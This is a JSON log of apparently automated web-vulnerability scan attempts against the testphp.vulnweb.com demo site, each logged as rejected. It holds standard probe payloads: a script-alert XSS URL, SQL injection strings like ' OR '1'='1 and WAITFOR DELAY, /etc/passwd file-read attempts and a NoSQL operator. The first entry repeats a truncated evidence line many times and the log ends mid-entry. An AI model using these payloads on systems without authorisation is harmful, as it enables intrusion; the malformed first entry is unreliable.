{ "traces": [ { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript%3Ealert('XSS')%3C/script%3E", "parameter": "pp", "reasoning_steps": [ "Tested xss_reflected on http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript%3Ealert('XSS')%3C/script%3E", "Parameter: pp", "Payload: ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: Stored XSS: payload reflected in dangerous context (", "evidence_summary": "Stored XSS: payload reflected in dangerous context (alert('DOMXSS')", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects ", "Evidence: XSS payload in auto-executing context: Payload injects ", "evidence_summary": "XSS payload in auto-executing context: Payload injects " ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771267782.936387 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771267787.698983 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771267793.9624372 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "'" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771267798.90123 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "\"" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771267807.424875 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771267819.037492 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 1=1--" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771267824.925566 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 1=2--" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771267831.1092339 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 'a'='a" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771267840.948214 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771268667.2495182 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771268677.7514272 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771268686.018811 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771268692.0056791 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771268697.6607301 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match); AI confirms payload was ineffective (score: 0/100)", "timestamp": 1771268703.2968361 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771269632.6577752 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771269634.300543 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771269636.2402391 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771269638.092785 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771269639.9347498 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771269641.769048 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php?artist=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in artist: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771269753.797302 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php?artist=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in artist: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771269755.58939 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php?artist=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in artist: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771269757.3576362 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php?artist=1", "attempted_payloads": [ "'" ], "failure_reason": "Rejected sqli_error in artist: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771269759.021182 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php?artist=1", "attempted_payloads": [ "\"" ], "failure_reason": "Rejected sqli_error in artist: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771269760.974498 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php?artist=1", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected sqli_error in artist: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771269762.558264 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php?artist=1", "attempted_payloads": [ "' AND 1=1--" ], "failure_reason": "Rejected sqli_blind in artist: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771269764.3446999 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php?artist=1", "attempted_payloads": [ "' AND 1=2--" ], "failure_reason": "Rejected sqli_blind in artist: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771269766.188575 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php?artist=1", "attempted_payloads": [ "' AND 'a'='a" ], "failure_reason": "Rejected sqli_blind in artist: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771269768.034654 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/search.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in test: no proof of execution (score: 20/100)", "timestamp": 1771269934.330056 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in pic: no proof of execution; negative controls show same behavior (2/4 controls match) (score: 0/100)", "timestamp": 1771269939.4603882 }, { "vuln_type": "arbitrary_file_read", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "/etc/passwd" ], "failure_reason": "Rejected arbitrary_file_read in pic: negative controls show same behavior (3/4 controls match) (score: 0/100)", "timestamp": 1771269941.3968482 }, { "vuln_type": "nosql_injection", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "{\"$gt\": \"\"}" ], "failure_reason": "Rejected nosql_injection in pic: no proof of execution; negative controls show same behavior (2/4 controls match) (score: 0/100)", "timestamp": 1771269943.048608 }, { "vuln_type": "nosql_injection", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/hpp/", "attempted_payloads": [ "{\"$gt\": \"\"}" ], "failure_reason": "Rejected nosql_injection in pp: no proof of execution (score: 20/100)", "timestamp": 1771269945.9105651 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771269948.038503 }, { "vuln_type": "arbitrary_file_read", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "/etc/passwd" ], "failure_reason": "Rejected arbitrary_file_read in cat: negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771269949.997208 }, { "vuln_type": "nosql_injection", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "{\"$gt\": \"\"}" ], "failure_reason": "Rejected nosql_injection in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771269951.8562272 }, { "vuln_type": "nosql_injection", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/showimage.php", "attempted_payloads": [ "{\"$gt\": \"\"}" ], "failure_reason": "Rejected nosql_injection in file: no proof of execution; negative controls show same behavior (2/4 controls match) (score: 0/100)", "timestamp": 1771269954.9127839 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771269957.2755818 }, { "vuln_type": "arbitrary_file_read", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "/etc/passwd" ], "failure_reason": "Rejected arbitrary_file_read in artist: negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771269958.9315991 }, { "vuln_type": "nosql_injection", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "{\"$gt\": \"\"}" ], "failure_reason": "Rejected nosql_injection in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771269960.877931 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771274082.697197 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771274084.421931 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771274086.165426 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771274087.9972548 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771274089.636482 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771274091.383049 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771274202.694825 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771274204.536343 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771274206.272691 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "'" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771274208.030637 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "\"" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771274209.752471 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771274211.697767 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 1=1--" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771274213.644196 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 1=2--" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771274215.404855 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 'a'='a" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771274217.287173 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771274316.399603 }, { "vuln_type": "arbitrary_file_read", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "/etc/passwd" ], "failure_reason": "Rejected arbitrary_file_read in artist: negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771274318.2017238 }, { "vuln_type": "nosql_injection", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "{\"$gt\": \"\"}" ], "failure_reason": "Rejected nosql_injection in artist: negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771274319.951565 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771274323.948448 }, { "vuln_type": "arbitrary_file_read", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "/etc/passwd" ], "failure_reason": "Rejected arbitrary_file_read in cat: negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771274325.881962 }, { "vuln_type": "nosql_injection", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "{\"$gt\": \"\"}" ], "failure_reason": "Rejected nosql_injection in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771274327.6548638 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/search.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in test: no proof of execution (score: 20/100)", "timestamp": 1771274329.6427011 }, { "vuln_type": "nosql_injection", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/hpp/", "attempted_payloads": [ "{\"$gt\": \"\"}" ], "failure_reason": "Rejected nosql_injection in pp: no proof of execution (score: 20/100)", "timestamp": 1771274333.2546601 }, { "vuln_type": "nosql_injection", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/showimage.php", "attempted_payloads": [ "{\"$gt\": \"\"}" ], "failure_reason": "Rejected nosql_injection in file: no proof of execution; negative controls show same behavior (2/4 controls match) (score: 0/100)", "timestamp": 1771274336.0340512 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in pic: no proof of execution; negative controls show same behavior (2/4 controls match) (score: 0/100)", "timestamp": 1771274338.074872 }, { "vuln_type": "arbitrary_file_read", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "/etc/passwd" ], "failure_reason": "Rejected arbitrary_file_read in pic: negative controls show same behavior (3/4 controls match) (score: 0/100)", "timestamp": 1771274339.825067 }, { "vuln_type": "nosql_injection", "technology": "Server: nginx/1.19.0, 